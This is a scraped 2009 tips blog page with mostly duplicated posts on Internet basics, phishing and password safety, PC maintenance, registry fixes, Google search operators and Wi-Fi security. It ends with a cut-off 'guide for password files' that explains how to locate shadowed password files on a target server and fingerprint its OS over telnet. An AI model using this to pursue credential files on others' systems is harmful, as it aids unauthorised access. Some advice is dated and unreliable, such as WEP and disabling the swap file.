For example, a document created in Microsoft Word can be attached to an e-mail message and retrieved by the recipient with the appropriate e-mail program. Many e-mail programs, including Eudora,Netscape Messenger, and Microsoft Outlook, offer the ability to read files written in HTML, which is itself a MIME type.
TELNETTelnet is a program that allows you to log into computers on the Internet and use online databases, library catalogs, chat services, and more. There are no graphics in Telnet sessions, just text. To Telnet to a computer, you must know its address. This can consist of words (locis.loc.gov) or numbers ( 140.147.254.3 ). Some services require you to connect to a specific port on the remote computer. In this case, type the port number after the Internet address. Example: telnet nri.reston.va.us 185.
Telnet is available on the World Wide Web. Probably the most common Web-based resources available through Telnet have been library catalogs, though most catalogs have since migrated to the Web. A link to a Telnet resource may look like any other link, but it will launch a Telnet session to make the connection. A Telnet program must be installed on your local computer and configured to your Web browser in order to work.
With the increasing popularity of the Web, Telnet has become less frequently used as a means of access to information on the Internet.
FTPFTP stands for File Transfer Protocol. This is both a program and the method used to transfer files between computers. Anonymous FTP is an option that allows users to transfer files from thousands of host computers on the Internet to their personal computer account. FTP sites contain books, articles, software, games, images, sounds, multimedia, course work, data sets, and more.
If your computer is directly connected to the Internet via an Ethernet cable, you can use one of several PC software programs, such as WS_FTP for Windows, to conduct a file transfer.
FTP transfers can be performed on the World Wide Web without the need for special software. In this case, the Web browser will suffice. Whenever you download software from a Web site to your local machine, you are using FTP. You can also retrieve FTP files via search engines such as FtpFind, located at / http://www.ftpfind.com/. This option is easiest because you do not need to know FTP program commands.
E-MAIL DISCUSSION GROUPSOne of the benefits of the Internet is the opportunity it offers to people worldwide to communicate via e-mail. The Internet is home to a large community of individuals who carry out active discussions organized around topic-oriented forums distributed by e-mail. These are administered by software programs. Probably the most common program is the listserv.
A great variety of topics are covered by listservs, many of them academic in nature. When you subscribe to a listserv, messages from other subscribers are automatically sent to your electronic mailbox. You subscribe to a listserv by sending an e-mail message to a computer program called a listserver. Listservers are located on computer networks throughout the world. This program handles subscription information and distributes messages to and from subscribers. You must have a e- mail account to participate in a listserv discussion group. Visit Tile.net at / http://tile.net/ to see an example of a site that offers a searchablecollection of e-mail discussion groups.
Majordomo and Listproc are two other programs that administer e-mail discussion groups. The commands for subscribing to and managing your list memberships are similar to those of listserv.
USENET NEWSUsenet News is a global electronic bulletin board system in which millions of computer users exchange information on a vast range of topics. The major difference between Usenet News and e- mail discussion groups is the fact that Usenet messages are stored on central computers, and users must connect to these computers to read or download the messages posted to these groups. This is distinct from e-mail distribution, in which messages arrive in the electronic mailboxes of each list member.
Usenet itself is a set of machines that exchanges messages, or articles, from Usenet discussion forums, called newsgroups. Usenet administrators control their own sites, and decide which (if any) newsgroups to sponsor and which remote newsgroups to allow into the system.
There are thousands of Usenet newsgroups in existence. While many are academic in nature, numerous newsgroups are organized around recreational topics. Much serious computer- related work takes place in Usenet discussions. A small number of e-mail discussion groups also exist as Usenet newsgroups.
The Usenet newsfeed can be read by a variety of newsreader software programs. For example, the Netscape suite comes with a newsreader program called Messenger. Newsreaders are also available as standalone products.
FAQ, RFC, FYIFAQ stands for Frequently Asked Questions. These are periodic postings to Usenet newsgroups that contain a wealth of information related to the topic of the newsgroup. Many FAQs are quite extensive. FAQs are available by subscribing to individual Usenet newsgroups. A Web-based collection of FAQ resources has been collected by The Internet FAQ Consortium and is available at / http://www.faqs.org/.
RFC stands for Request for Comments. These are documents created by and distributed to the Internet community to help define the nuts and bolts of the Internet.
Showing posts with label help. Show all posts
Showing posts with label help. Show all posts
Saturday, September 12, 2009
Guide to Internet part 1
Internet Guide : A Basic Guide
The Internet is a computer network made up of thousands of networks worldwide. No one knows exactly how many computers are connected to the Internet. It is certain, however, that these number in the millions.
No one is in charge of the Internet. There are organizations which develop technical aspects of this network and set standards for creating applications on it, but no governing body is in control. The Internet backbone, through which Internet traffic flows, is owned by private companies.
All computers on the Internet communicate with one another using the Transmission Control Protocol/Internet Protocol suite, abbreviated to TCP/IP. Computers on the Internet use a client/server architecture. This means that the remote server machine provides files and services to the user's local client machine. Software can be installed on a client computer to take advantage of the latest access technology.
An Internet user has access to a wide variety of services: electronic mail,file transfer, vast information resources, interest group membership, interactive collaboration, multimedia displays, real-time broadcasting, shopping opportunities, breaking news, and much more.
The Internet consists primarily of a variety of access protocols. Many of these protocols feature programs that allow users to search for and retrieve material made available by the protocol.
-------------------------------- -------------------------------- ----------------
COMPONENTS OF THE INTERNET
-------------------------------- -------------------------------- ----------------
WORLD WIDE WEBThe World Wide Web (abbreviated as the Web or WWW) is a system of Internet servers that supports hypertext to access several Internet protocols on a single interface. Almost every protocol type available on the Internet is accessible on the Web. This includes e-mail, FTP, Telnet, and Usenet News. In addition to these, the World Wide Web has its own protocol: HyperText Transfer Protocol, or HTTP. These protocols will be explained later in this document.
The World Wide Web provides a single interface for accessing all these protocols. This creates a convenient and user-friendly environment. It is no longer necessary to be conversant in these protocols within separate, command-level environments. The Web gathers together these protocols into a single system. Because of this feature, and because of the Web's ability to work with multimedia and advanced programming languages, the Web is the fastest-growing component of the Internet.
The operation of the Web relies primarily on hypertext as its means of information retrieval. HyperText is a document containing words that connect to other documents. These words are called links and are selectable by the user. A single hypertext document can contain links to many documents. In the context of the Web, words or graphics may serve as links to other documents, images, video, and sound. Links may or may not follow a logical path, as each connection is programmed by the creator of the source document. Overall, the Web contains a complex virtual web of connections among a vast number of documents, graphics, videos, and sounds.
Producing hypertext for the Web is accomplished by creating documents with a language called HyperText Markup Language, or HTML. With HTML, tags are placed within the text to accomplish document formatting, visual features such as font size, italics and bold, and the creation of hypertext links. Graphics and multimedia may also be incorporated into an HTML document. HTML is an evolving language, with new tags being added as each upgrade of the language is developed and released. The World Wide Web Consortium (W3C), led by Web founder Tim Berners-Lee, coordinates the efforts of standardizing HTML. The W3C now calls the language XHTML and considers it to be an application of the XML language standard.
The World Wide Web consists of files, called pages or home pages, containing links to documents and resources throughout the Internet.
The Web provides a vast array of experiences including multimedia presentations, real- time collaboration, interactive pages, radio and television broadcasts, and the automatic "push" of information to a client computer. Programming languages such as Java, JavaScript, Visual Basic, Cold Fusion and XML are extending the capabilities of the Web. A growing amount of information on the Web is served dynamically from content stored in databases. The Web is therefore not a fixed entity, but one that is in a constant state of development and flux.
For more complete information about the World Wide Web, see Understanding The World Wide Web.
E-MAILElectronic mail, or e-mail, allows computer users locally and worldwide to exchange messages. Each user of e-mail has a mailbox address to which messages are sent. Messages sent through e-mail can arrive within a matter of seconds.
A powerful aspect of e-mail is the option to send electronic files to a person's e-mail address. Non-ASCII files, known as binary files, may be attached to e-mail messages. These files are referred to as MIME attachments.MIME stands for Multimedia Internet Mail Extension, and was developed to help e-mail software handle a variety of file types. Read part 2 to continue....
The Internet is a computer network made up of thousands of networks worldwide. No one knows exactly how many computers are connected to the Internet. It is certain, however, that these number in the millions.
No one is in charge of the Internet. There are organizations which develop technical aspects of this network and set standards for creating applications on it, but no governing body is in control. The Internet backbone, through which Internet traffic flows, is owned by private companies.
All computers on the Internet communicate with one another using the Transmission Control Protocol/Internet Protocol suite, abbreviated to TCP/IP. Computers on the Internet use a client/server architecture. This means that the remote server machine provides files and services to the user's local client machine. Software can be installed on a client computer to take advantage of the latest access technology.
An Internet user has access to a wide variety of services: electronic mail,file transfer, vast information resources, interest group membership, interactive collaboration, multimedia displays, real-time broadcasting, shopping opportunities, breaking news, and much more.
The Internet consists primarily of a variety of access protocols. Many of these protocols feature programs that allow users to search for and retrieve material made available by the protocol.
-------------------------------- -------------------------------- ----------------
COMPONENTS OF THE INTERNET
-------------------------------- -------------------------------- ----------------
WORLD WIDE WEBThe World Wide Web (abbreviated as the Web or WWW) is a system of Internet servers that supports hypertext to access several Internet protocols on a single interface. Almost every protocol type available on the Internet is accessible on the Web. This includes e-mail, FTP, Telnet, and Usenet News. In addition to these, the World Wide Web has its own protocol: HyperText Transfer Protocol, or HTTP. These protocols will be explained later in this document.
The World Wide Web provides a single interface for accessing all these protocols. This creates a convenient and user-friendly environment. It is no longer necessary to be conversant in these protocols within separate, command-level environments. The Web gathers together these protocols into a single system. Because of this feature, and because of the Web's ability to work with multimedia and advanced programming languages, the Web is the fastest-growing component of the Internet.
The operation of the Web relies primarily on hypertext as its means of information retrieval. HyperText is a document containing words that connect to other documents. These words are called links and are selectable by the user. A single hypertext document can contain links to many documents. In the context of the Web, words or graphics may serve as links to other documents, images, video, and sound. Links may or may not follow a logical path, as each connection is programmed by the creator of the source document. Overall, the Web contains a complex virtual web of connections among a vast number of documents, graphics, videos, and sounds.
Producing hypertext for the Web is accomplished by creating documents with a language called HyperText Markup Language, or HTML. With HTML, tags are placed within the text to accomplish document formatting, visual features such as font size, italics and bold, and the creation of hypertext links. Graphics and multimedia may also be incorporated into an HTML document. HTML is an evolving language, with new tags being added as each upgrade of the language is developed and released. The World Wide Web Consortium (W3C), led by Web founder Tim Berners-Lee, coordinates the efforts of standardizing HTML. The W3C now calls the language XHTML and considers it to be an application of the XML language standard.
The World Wide Web consists of files, called pages or home pages, containing links to documents and resources throughout the Internet.
The Web provides a vast array of experiences including multimedia presentations, real- time collaboration, interactive pages, radio and television broadcasts, and the automatic "push" of information to a client computer. Programming languages such as Java, JavaScript, Visual Basic, Cold Fusion and XML are extending the capabilities of the Web. A growing amount of information on the Web is served dynamically from content stored in databases. The Web is therefore not a fixed entity, but one that is in a constant state of development and flux.
For more complete information about the World Wide Web, see Understanding The World Wide Web.
E-MAILElectronic mail, or e-mail, allows computer users locally and worldwide to exchange messages. Each user of e-mail has a mailbox address to which messages are sent. Messages sent through e-mail can arrive within a matter of seconds.
A powerful aspect of e-mail is the option to send electronic files to a person's e-mail address. Non-ASCII files, known as binary files, may be attached to e-mail messages. These files are referred to as MIME attachments.MIME stands for Multimedia Internet Mail Extension, and was developed to help e-mail software handle a variety of file types. Read part 2 to continue....
Friday, August 21, 2009
Security Tips and Fraud Prevention
For any User, maintaining the account's security is the top priority. To augment the security measures that the Online Service Provide on your behalf, there are steps that you can take to help protect your account from fraud and scams. Note: Here we will be using the URL www.WebsiteName.com for explaining you. This can be the Domain name of the Online Service you are Using. But for Explanation Purpose we will be using WebsiteName as the Name of the Website and www.WebsiteName.com as the URL. Website Security
Use SSL Connection: To safely and securely access your account, open a new web browser (e.g., Internet Explorer or Netscape) and type the URL in the following way:
https:// www.WebsiteName.com/.
As you can see I have written https:// instead of http:// which you use normally. This can be used in those website which provide SSL Authentication. Not all Websites provide SSL( Secure Sockets Layer) but most of the Online Services like GMail, Yahoo, MSN, Orkut, Facebook, eBay etc provide SSL.
Password Safety
Never share your password: Any Website representative will never ask you for your password. If you believe someone has learned your password, please change it immediately.
Create a secure password: Choose a password that uses a combination of letters, numbers, and symbols. For example, $coo!place2 l!ve or 2 Barry5 Bonds#1. Avoid choosing obvious words or dates such as a nickname or your birth date.
Keep your password unique: Don't use the same password for all the online services such as AOL, eBay, MSN, or Yahoo. Using the same password for multiple websites increases the likelihood that someone could learn your password and gain access to your account.
Email Security
Look for a Greeting: Any Website will never send an email with the greeting "Dear WebsiteName User" or "Dear WebsiteName Member." Real WebsiteName emails will address you by your first and last name or the business name associated with your WebsiteName account. If you believe you have received a fraudulent email, Send a copy of the spoofed e-mail you received to your ISP's abuse desk. The e- mail address for this is usually abuse@yourisp.com or postmaster@yourisp.com but if you are not sure, visit your ISP's Web site and search for the information - it will be there.
Don't share personal information via email: Any Website will never ask you to enter your password or financial information in an email or send such information in an email. You should only share information about your account once you have logged in to your Account.
Don't download attachments: Any Website will never send you an attachment or Software update to install on your computer.
Use SSL Connection: To safely and securely access your account, open a new web browser (e.g., Internet Explorer or Netscape) and type the URL in the following way:
https:// www.WebsiteName.com/.
As you can see I have written https:// instead of http:// which you use normally. This can be used in those website which provide SSL Authentication. Not all Websites provide SSL( Secure Sockets Layer) but most of the Online Services like GMail, Yahoo, MSN, Orkut, Facebook, eBay etc provide SSL.
Password Safety
Never share your password: Any Website representative will never ask you for your password. If you believe someone has learned your password, please change it immediately.
Create a secure password: Choose a password that uses a combination of letters, numbers, and symbols. For example, $coo!place2 l!ve or 2 Barry5 Bonds#1. Avoid choosing obvious words or dates such as a nickname or your birth date.
Keep your password unique: Don't use the same password for all the online services such as AOL, eBay, MSN, or Yahoo. Using the same password for multiple websites increases the likelihood that someone could learn your password and gain access to your account.
Email Security
Look for a Greeting: Any Website will never send an email with the greeting "Dear WebsiteName User" or "Dear WebsiteName Member." Real WebsiteName emails will address you by your first and last name or the business name associated with your WebsiteName account. If you believe you have received a fraudulent email, Send a copy of the spoofed e-mail you received to your ISP's abuse desk. The e- mail address for this is usually abuse@yourisp.com or postmaster@yourisp.com but if you are not sure, visit your ISP's Web site and search for the information - it will be there.
Don't share personal information via email: Any Website will never ask you to enter your password or financial information in an email or send such information in an email. You should only share information about your account once you have logged in to your Account.
Don't download attachments: Any Website will never send you an attachment or Software update to install on your computer.
Pc Maintainance Guide part 2
Look for Trouble
Give your PC a periodic checkup with a good hardware diagnostic utility. Two excellent choices are Sandra Standard from SiSoftware and #1 - TuffTest-Lite from #1 -PC Diagnostics. Download the free version of Sandra (the full version of the application costs $35 ) or to download #1 - TuffTest-Lite (the fully functional version is $10).
Sandra Standard:
CODE
http://www.pcworld.com/down loads/file_description/0 ,fid,4005 ,tk,ur,00.asp
#1-TuffTest-Lite:
CODE
http://www.pcworld.com/down loads/file_description/0 ,fid,7725 ,tk,ur,00.asp
Adding and removing system components leaves orphaned entries in the Windows Registry. This can increase the time your PC takes to boot and can slow system performance. Many shareware utilities are designed to clean the Registry.
Windows stores files on a hard drive in rows of contiguous segments, but over time the disk fills and segments become scattered, so they take longer to access. To keep your drive shipshape, run Windows' Disk Defragmenter utility. Click Start, Programs (All Programs in XP), Accessories, System Tools, Disk Defragmenter. If your drive is heavily fragmented, you could boost performance. Defragging may take hours, however. Disable your screen saver and other automatic programs beforehand to keep the defrag from restarting every few minutes.
Disk Defragmenter won't defragment the file on your hard drive that holds overflow data from system memory (also known as the swap file). Since the swap file is frequently accessed, defragmenting it can give your PC more pep. You can defragment your swap file by using a utility such as the SpeedDisk program included with Norton SystemWorks 2004, but there's a way to reset it in Windows.
In Windows XP, right-click My Computer and choose Properties. Click Advanced, and then choose the Settings button under Performance. Click Advanced again and the Change button under Virtual Memory. Select another drive or partition, set your swap file size, and click OK.
If you have only one partition and no way to create a second one, and you have at least 256MB of RAM, disable the swap file rather than moving it: Select "No paging file" in the Virtual Memory settings. If you have trouble booting, start Windows in Safe Mode and re- enable this option.
Hard-Drive Checkup
Windows XP offers a rudimentary evaluation of your hard disk's health with its error-checking utility: Right-click the drive's icon in Windows Explorer and select Properties, Tools, Check Now. (Windows can fix errors and recover bad sectors automatically if you wish.) If the check discovers a few file errors, don't worry, but if it comes up with hundreds of errors, the drive could be in trouble.
To conduct a more thorough examination, download Panterasoft's free HDD Health utility, which monitors hard- drive performance and warns of impending disaster:
CODE
http://www.pcworld.com/down loads/file_description/0 ,fid, 22945 ,tk,ur,00.asp
The program works only with drives that support S.M.A.R.T technology, but nearly all drives released since 2000 are S.M.A.R.T.-compliant.
Many hardware and software designers humbly assume you want their program running on your PC all the time, so they tell Windows to load the application at startup (hence, the ever-growing string of icons in your system tray). These programs eat up system resources and make hardware conflicts and compatibility problems more likely. To prevent them from launching, just click Start, Run, type "msconfig" and press Enter. The programs listed under the Startup tab are set to start along with Windows. Uncheck the box at the left of each undesirable program to prevent it from starting automatically.
Four Tips for Longer PC Life
1. Keep your PC in a smoke-free environment. Tobacco smoke can damage delicate contacts and circuits.
2. Leave your PC running. Powering up from a cold state is one of the most stressful things you can do to your system's components. If you don't want to leave your PC running all the time, use Windows' Power Management settings to put your machine into hibernation rather than completely shutting down. In Windows XP, right-click the desktop and select Properties. Click the Screen Saver tab and select the Power button. Choose the Hibernate tab to ensure that hibernation is enabled, and then select a time beneath "System hibernates" under the Power Schemes tab. (Note that this option is not available on all PCs.) Computers running older versions of Windows may or may not provide similar power- management features. Look under the Power Management icon (Power Options in Windows 2000) in Control Panel to evaluate your machine's capabilities.
3. Don't leave your monitor running. The best way to extend your display's life is to shut it off when it's not in use.
4. Avoid jostling the PC. Whenever you move your system, even if it's just across the desktop, make sure the machine is shut down and unplugged.
uhh....It is long but usefull
Give your PC a periodic checkup with a good hardware diagnostic utility. Two excellent choices are Sandra Standard from SiSoftware and #1 - TuffTest-Lite from #1 -PC Diagnostics. Download the free version of Sandra (the full version of the application costs $35 ) or to download #1 - TuffTest-Lite (the fully functional version is $10).
Sandra Standard:
CODE
http://www.pcworld.com/down loads/file_description/0 ,fid,4005 ,tk,ur,00.asp
#1-TuffTest-Lite:
CODE
http://www.pcworld.com/down loads/file_description/0 ,fid,7725 ,tk,ur,00.asp
Adding and removing system components leaves orphaned entries in the Windows Registry. This can increase the time your PC takes to boot and can slow system performance. Many shareware utilities are designed to clean the Registry.
Windows stores files on a hard drive in rows of contiguous segments, but over time the disk fills and segments become scattered, so they take longer to access. To keep your drive shipshape, run Windows' Disk Defragmenter utility. Click Start, Programs (All Programs in XP), Accessories, System Tools, Disk Defragmenter. If your drive is heavily fragmented, you could boost performance. Defragging may take hours, however. Disable your screen saver and other automatic programs beforehand to keep the defrag from restarting every few minutes.
Disk Defragmenter won't defragment the file on your hard drive that holds overflow data from system memory (also known as the swap file). Since the swap file is frequently accessed, defragmenting it can give your PC more pep. You can defragment your swap file by using a utility such as the SpeedDisk program included with Norton SystemWorks 2004, but there's a way to reset it in Windows.
In Windows XP, right-click My Computer and choose Properties. Click Advanced, and then choose the Settings button under Performance. Click Advanced again and the Change button under Virtual Memory. Select another drive or partition, set your swap file size, and click OK.
If you have only one partition and no way to create a second one, and you have at least 256MB of RAM, disable the swap file rather than moving it: Select "No paging file" in the Virtual Memory settings. If you have trouble booting, start Windows in Safe Mode and re- enable this option.
Hard-Drive Checkup
Windows XP offers a rudimentary evaluation of your hard disk's health with its error-checking utility: Right-click the drive's icon in Windows Explorer and select Properties, Tools, Check Now. (Windows can fix errors and recover bad sectors automatically if you wish.) If the check discovers a few file errors, don't worry, but if it comes up with hundreds of errors, the drive could be in trouble.
To conduct a more thorough examination, download Panterasoft's free HDD Health utility, which monitors hard- drive performance and warns of impending disaster:
CODE
http://www.pcworld.com/down loads/file_description/0 ,fid, 22945 ,tk,ur,00.asp
The program works only with drives that support S.M.A.R.T technology, but nearly all drives released since 2000 are S.M.A.R.T.-compliant.
Many hardware and software designers humbly assume you want their program running on your PC all the time, so they tell Windows to load the application at startup (hence, the ever-growing string of icons in your system tray). These programs eat up system resources and make hardware conflicts and compatibility problems more likely. To prevent them from launching, just click Start, Run, type "msconfig" and press Enter. The programs listed under the Startup tab are set to start along with Windows. Uncheck the box at the left of each undesirable program to prevent it from starting automatically.
Four Tips for Longer PC Life
1. Keep your PC in a smoke-free environment. Tobacco smoke can damage delicate contacts and circuits.
2. Leave your PC running. Powering up from a cold state is one of the most stressful things you can do to your system's components. If you don't want to leave your PC running all the time, use Windows' Power Management settings to put your machine into hibernation rather than completely shutting down. In Windows XP, right-click the desktop and select Properties. Click the Screen Saver tab and select the Power button. Choose the Hibernate tab to ensure that hibernation is enabled, and then select a time beneath "System hibernates" under the Power Schemes tab. (Note that this option is not available on all PCs.) Computers running older versions of Windows may or may not provide similar power- management features. Look under the Power Management icon (Power Options in Windows 2000) in Control Panel to evaluate your machine's capabilities.
3. Don't leave your monitor running. The best way to extend your display's life is to shut it off when it's not in use.
4. Avoid jostling the PC. Whenever you move your system, even if it's just across the desktop, make sure the machine is shut down and unplugged.
uhh....It is long but usefull
Fixing slow logon time
My problem was a 1 min login delay due the aktiveds.dll that loads at startup (thanks to NicTech Networks Inc.). The following advice worked for me so I guess it works for any.dll made by NicTech since they all use the same registry folder....
Open up regedit.exe and find THIS folder. Navigate to it by clicking the +'s to expand
things like you would in Windows explorer:
HKEY_LOCAL_MACHINE\SOFTWA RE\Microsoft\Windows NT\CurrentVersion\Winlogon\No tify\Guardian
Right click over "Guardian" in the left pane.
Left click on "Permissions"
Left click "SYSTEM" once to highlight it.
Check "deny" in all boxes that you can at the bottom (Probably only 2)
Left click Apply
Left Click OK
Say "OK" to any warnings about permissions
**Reboot** the system
then problems solved
I got this information from another forum. I had this problem for about six weeks and was just about ready to reformat my hard drive. Worked great for me, hope this helps out somebody else.
Open up regedit.exe and find THIS folder. Navigate to it by clicking the +'s to expand
things like you would in Windows explorer:
HKEY_LOCAL_MACHINE\SOFTWA RE\Microsoft\Windows NT\CurrentVersion\Winlogon\No tify\Guardian
Right click over "Guardian" in the left pane.
Left click on "Permissions"
Left click "SYSTEM" once to highlight it.
Check "deny" in all boxes that you can at the bottom (Probably only 2)
Left click Apply
Left Click OK
Say "OK" to any warnings about permissions
**Reboot** the system
then problems solved
I got this information from another forum. I had this problem for about six weeks and was just about ready to reformat my hard drive. Worked great for me, hope this helps out somebody else.
Boost up your site loading time..
This article by Drunkadmin had hit the front pages of Digg . It gives a good idea on optimizing web pages that will definitely increase a website's loading time. Host Images And Files Somewhere Else
Many users online at the same time can cause your server to handle a lot of requests. Its best that if you are using images in your site, make sure you upload them to image host sites like ImageShack . This will greatly reduce the bandwidth used by your server and also make your blog faster as image upload sites have a better speed.
Best place to host files of sizes 2-5mb (Any thing you need to provide users for download) is to use Google Pages as your host.
Optimize Your CSS
Nowadays many sites have started to use CSS based formatting. Even if Style Sheets are naturally more efficient than HTML tables you can still optimize the CSS code to make your website cleaner and faster. Having a clean CSS can reduce the time taken by the clients browser to decode your site.
Manual Clean Try to locate dispersed code and aggregate it together.
For example instead of margin- top: 20px;
margin-right: 10px;
margin-bottom: 20px;
margin-left: 10 px; Write margin: 20 px 10 px 20 px 10px; You can use the tool Clean CSS to optimize your CSS and remove useless property declaration and whitespaces. Optimize Your Images
Use image formats such as PNG, JPG,/JPEG And GIF. Always use the "Save for web" image quality which is available in most softwares such as Adobe Photoshop.
Use Height/Width Tag In Images
Most people dont add hieght and width tag to images. These tags make sure that the browser knows the dimensions of images before it has completed downloading the image. If the browser does not see those tags it will need to figure the size of the image, then load the image and then load the rest of the page.
When the height and width tags are included the browser will automatically know the size of the image. As a consequence it will be able to hold a place for the image and load the rest of the page simultaneously. Apart from the improvement on the load time of the page this method is also more user friendly since the visitor can start reading the text or other information while the image is being downloaded. Use Less Javascript!
Some people tend to add a lot of javascript effects to their site. Using excessive javascript animations may cause clients browser to freeze for some time annoying the user.
Optimize Links
Make sure that the outlinks from your blog and link between posts are optimized well. For example if link is www.domain.com/blog make sure you write it as www.domain.com/blog/ to prevent one extra request which would be made to the server if the former link is used.
The improvement on the loading time of links ending with a slash will not be astronomical, but when it comes to speeding up a website every small bit helps!
Reduce HTTP Requests To Server
When opening a web page every object (images, scripts and the line) will require a round trip to the server. This latency can add several seconds to the load time of your site. Make sure to reduce the number of objects and to combine CSS files and scripts together.
Many users online at the same time can cause your server to handle a lot of requests. Its best that if you are using images in your site, make sure you upload them to image host sites like ImageShack . This will greatly reduce the bandwidth used by your server and also make your blog faster as image upload sites have a better speed.
Best place to host files of sizes 2-5mb (Any thing you need to provide users for download) is to use Google Pages as your host.
Optimize Your CSS
Nowadays many sites have started to use CSS based formatting. Even if Style Sheets are naturally more efficient than HTML tables you can still optimize the CSS code to make your website cleaner and faster. Having a clean CSS can reduce the time taken by the clients browser to decode your site.
Manual Clean Try to locate dispersed code and aggregate it together.
For example instead of margin- top: 20px;
margin-right: 10px;
margin-bottom: 20px;
margin-left: 10 px; Write margin: 20 px 10 px 20 px 10px; You can use the tool Clean CSS to optimize your CSS and remove useless property declaration and whitespaces. Optimize Your Images
Use image formats such as PNG, JPG,/JPEG And GIF. Always use the "Save for web" image quality which is available in most softwares such as Adobe Photoshop.
Use Height/Width Tag In Images
Most people dont add hieght and width tag to images. These tags make sure that the browser knows the dimensions of images before it has completed downloading the image. If the browser does not see those tags it will need to figure the size of the image, then load the image and then load the rest of the page.
When the height and width tags are included the browser will automatically know the size of the image. As a consequence it will be able to hold a place for the image and load the rest of the page simultaneously. Apart from the improvement on the load time of the page this method is also more user friendly since the visitor can start reading the text or other information while the image is being downloaded. Use Less Javascript!
Some people tend to add a lot of javascript effects to their site. Using excessive javascript animations may cause clients browser to freeze for some time annoying the user.
Optimize Links
Make sure that the outlinks from your blog and link between posts are optimized well. For example if link is www.domain.com/blog make sure you write it as www.domain.com/blog/ to prevent one extra request which would be made to the server if the former link is used.
The improvement on the loading time of links ending with a slash will not be astronomical, but when it comes to speeding up a website every small bit helps!
Reduce HTTP Requests To Server
When opening a web page every object (images, scripts and the line) will require a round trip to the server. This latency can add several seconds to the load time of your site. Make sure to reduce the number of objects and to combine CSS files and scripts together.
Tuesday, August 18, 2009
some USEFULL google tricks
A few things you might want to try with Google:
Hand type the following prefixes and note their utility:
link:url Shows other pages with links to that url.
related:url same as "what's related" on serps.
site:domain restricts search results to the given domain.
allinurl: shows only pages with all terms in the url.
inurl: like allinurl, but only for the next query word.
allintitle: shows only results with terms in title.
intitle: similar to allintitle, but only for the next word. "intitle:webmasterworld google" finds only pages with webmasterworld in the title, and google anywhere on the page.
cache:url will show the Google version of the passed url.
info:url will show a page containing links to related searches, backlinks, and pages containing the url. This is the same as typing the url into the search box.
spell: will spell check your query and search for it.
stocks: will lookup the search query in a stock index.
filetype: will restrict searches to that filetype. "-filetype:doc" to remove Microsoft word files.
daterange: is supported in Julian date format only. 2452384 is an example of a Julian date.
maps: If you enter a street address, a link to Yahoo Maps and to MapBlast will be presented.
phone: enter anything that looks like a phone number to have a name and address displayed. Same is true for something that looks like an address (include a name and zip code)
site:www.somesite.net "+ www.somesite.+net"
(tells you how many pages of your site are indexed by google)
allintext: searches only within text of pages, but not in the links or page title
allinlinks: searches only within links, not text or title
I hope there is something new in here for you and maybe this infos will be helpfull for you...
Hand type the following prefixes and note their utility:
link:url Shows other pages with links to that url.
related:url same as "what's related" on serps.
site:domain restricts search results to the given domain.
allinurl: shows only pages with all terms in the url.
inurl: like allinurl, but only for the next query word.
allintitle: shows only results with terms in title.
intitle: similar to allintitle, but only for the next word. "intitle:webmasterworld google" finds only pages with webmasterworld in the title, and google anywhere on the page.
cache:url will show the Google version of the passed url.
info:url will show a page containing links to related searches, backlinks, and pages containing the url. This is the same as typing the url into the search box.
spell: will spell check your query and search for it.
stocks: will lookup the search query in a stock index.
filetype: will restrict searches to that filetype. "-filetype:doc" to remove Microsoft word files.
daterange: is supported in Julian date format only. 2452384 is an example of a Julian date.
maps: If you enter a street address, a link to Yahoo Maps and to MapBlast will be presented.
phone: enter anything that looks like a phone number to have a name and address displayed. Same is true for something that looks like an address (include a name and zip code)
site:www.somesite.net "+ www.somesite.+net"
(tells you how many pages of your site are indexed by google)
allintext: searches only within text of pages, but not in the links or page title
allinlinks: searches only within links, not text or title
I hope there is something new in here for you and maybe this infos will be helpfull for you...
What to Do when Ur Orkut is Hacked!
It can be a nightmare if someone else takes control of your Google Account because all your Google services like Gmail, Orkut, Google Calendar, Blogger, AdSense, Google Docs and even Google Checkout are tied to the same account.
Here are some options suggested by Google Support when you forget the Gmail password or if someone else takes ownership of your Google Account and changes the password:
1. Reset Your Google Account Password:
Type the email address associated with your Google Account or Gmail user name at google.com/accounts/ForgotP asswd - you will receive an email at your secondary email address with a link to reset your Google Account Password.
This will not work if the other person has changed your secondary email address or if you no longer have access to that address.
2. For Google Accounts Associated with Gmail:
If you have problems while logging into your Gmail account, you can consider contacting Google by filling this form. It however requires you to remember the exact date when you created that Gmail account.
3. For Hijacked Google Accounts Not Linked to Gmail:
If your Google Account doesn't use a Gmail address, contact Google by filling this form. This approach may help bring back your Google Account if you religiously preserve all your old emails. You will be required to know the exact creation date of your Google Account plus a copy of that original "Google Email Verification" message.
It may be slightly tough to get your Google Account back but definitely not impossible if you have the relevant information in your secondary email mailbox.
Here are some options suggested by Google Support when you forget the Gmail password or if someone else takes ownership of your Google Account and changes the password:
1. Reset Your Google Account Password:
Type the email address associated with your Google Account or Gmail user name at google.com/accounts/ForgotP asswd - you will receive an email at your secondary email address with a link to reset your Google Account Password.
This will not work if the other person has changed your secondary email address or if you no longer have access to that address.
2. For Google Accounts Associated with Gmail:
If you have problems while logging into your Gmail account, you can consider contacting Google by filling this form. It however requires you to remember the exact date when you created that Gmail account.
3. For Hijacked Google Accounts Not Linked to Gmail:
If your Google Account doesn't use a Gmail address, contact Google by filling this form. This approach may help bring back your Google Account if you religiously preserve all your old emails. You will be required to know the exact creation date of your Google Account plus a copy of that original "Google Email Verification" message.
It may be slightly tough to get your Google Account back but definitely not impossible if you have the relevant information in your secondary email mailbox.
Thursday, August 13, 2009
Tips for Wireless Home Network Security
1) Change Default Administrator Passwords (and Usernames)
2) Turn on (Compatible) WPA / WEP Encryption
3) Change the Default SSID
4) Disable SSID Broadcast
5) Assign Static IP Addresses to Devices
6) Enable MAC Address Filtering
7) Turn Off the Network During Extended Periods of Non-Use
8) Position the Router or Access Point Safely
.. Follow these simple steps to no get hacked
2) Turn on (Compatible) WPA / WEP Encryption
3) Change the Default SSID
4) Disable SSID Broadcast
5) Assign Static IP Addresses to Devices
6) Enable MAC Address Filtering
7) Turn Off the Network During Extended Periods of Non-Use
8) Position the Router or Access Point Safely
.. Follow these simple steps to no get hacked
Sunday, August 2, 2009
ULTIMATE GUIDE FOR PASSWORD FILES. part 2
5. Shadowed Passwd's
Now if you happen to find a passwd fiel that looks something like this: "joetest:*:102 :100::/home/joetest:/usr/bin/re stsh"
which has a user name, not a programs, you have a shadowed passwd. The shadow file has the encrypted passwords on it. Depending on the Operating System, the passwd file may be in different places. To find out what Operating system your target is running from telnet (connected to that server of course) type uname -a and it should say, if you cannot get to telnet there is other methods of finding out. Here is a guide to systems passwd file locations (taken from a text on passwd files by Kryto.) A token is the * (or other symbol) beside a shadowed passwds user name
